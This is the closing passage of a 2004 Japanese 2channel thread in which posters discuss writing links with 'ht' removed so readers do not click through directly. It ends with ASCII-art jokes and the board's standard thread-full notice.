「ht」抜き

995 :名無しさん@お腹いっぱい。:04/10/07 01:39:34
>>994の「ht抜き」の方がいいね
h抜きだけじゃ飛べちゃうから

996 :名無しさん@お腹いっぱい。:04/10/07 08:53:22
直リンする馬鹿(「ht」抜きにしない)には答えませんって明記しとけ

997 :名無しさん@お腹いっぱい。:04/10/07 10:12:33
http://www.gooogle.com/
ttp://www.gooogle.com/
tp://www.gooogle.com/
p://www.gooogle.com/
://www.gooogle.com/
//www.gooogle.com/
/www.gooogle.com/
www.gooogle.com/

998 :名無しさん@お腹いっぱい。:04/10/07 10:15:21
抜くならhttまで必要だな。
いっそhttp://を省いてしまえばいい。

999 :名無しさん@お腹いっぱい。:04/10/07 10:24:53
Q
      ,-――――――-.
      /           |
     /           |
     /             |
    l"ジェンキン寿司   l
   ,、_lー-―――――‐--、/l
   i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
   ヾ,iハ゛.´ _,,、_  i.; _,. ` 彡'i)
    `、j,'  `゚''´:.ノ i::<・ゝ) .ハン       へいらっしゃい!!
     i,   ` ,、/ i_ `` ,r'
   ,r〃'i  ,r'ヽ、 _,〉  /.
   /i:ト、;;i,  ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、  ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i

1000 :名無しさん@お腹いっぱい。:04/10/07 10:32:55
僕と一緒に言ってごらん        γ
                      (
                      _ノ

                   /
                __
             ,、'"   .  `' 、
             i`ー  _    ',
.             l| !|      i""!|
                 }: }i    |{  !j
               〈| 'J |!   }j  :}
            _ノ;し  i}  {J  |
         ,、-,、'         ハ- 、
         ( .( '、_    _ ,ノ  ノ:i   )
        ,、'""`ー---‐'"フ、_ - _,、' -'"
        (  _   ,、'"    ̄
         `ー--─'"
千本目の蝋燭が消えますた・・・
新しい蝋燭を立ててくださいです・・・

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

295 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)